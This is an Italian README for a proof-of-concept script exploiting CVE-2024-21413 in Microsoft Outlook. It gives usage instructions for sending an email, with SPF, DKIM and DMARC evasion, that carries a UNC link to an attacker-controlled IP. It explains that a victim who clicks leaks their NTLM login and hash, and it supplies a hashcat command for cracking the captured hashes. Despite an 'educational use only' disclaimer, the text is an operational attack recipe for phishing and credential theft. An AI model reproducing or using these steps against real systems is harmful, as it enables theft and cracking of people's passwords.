
Vulnerabilità di divulgazione di informazioni di Microsoft Outlook (fuga di hash della password) - Expect Script POC
Vulnerabilità di perdita di credenziali ed esecuzione di codice remoto di Microsoft Outlook quando combinata con CVE-2023-21716 (tramite il pannello di anteprima) CVSS:3.1 9.8 / 8.5
Outlook dovrebbe avvisare del rischio nell'aprire un link esterno => ma non è così!

uso: ./cve-2024-21413.sh mx.fqdn porta mittente destinatario url
./cve-2024-21413.sh mail.mydomain.com 25 [email protected] [email protected] "\\xx.xx.xx.xx\test\duy31.txt"
note: chmod +x cve-2024-21413.sh
richiede app expect e richiede un mittente IP legittimo e un mittente email (per superare SPF, DKIM, DMARC)



quindi dovresti recuperare il login e l'hash della persona che ha cliccato sul link (senza il prompt di avviso nelle versioni di Outlook affette)

Puoi quindi provare a crackare la password con hashcat. Basta copiare tutta la riga con il nome utente in un file ed eseguire hashcat con il modulo 5600
hashcat -a 0 -m 5600 hash.txt rockyou.txt -o cracked.txt -O
Workaround/Correzione: [https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21413]
più su di me ;) https://www.linkedin.com/in/duy-huan-bui/
⚠️ Disclaimer: IMPORTANTE: Questo script è fornito SOLO per scopi educativi, test etici e uso legale. Non utilizzarlo su alcun sistema o rete senza autorizzazione esplicita. L'accesso non autorizzato a sistemi informatici e reti è illegale e gli utenti sorpresi a compiere attività non autorizzate sono soggetti ad azioni legali. L'autore NON è responsabile per eventuali danni causati dall'uso improprio di questo script.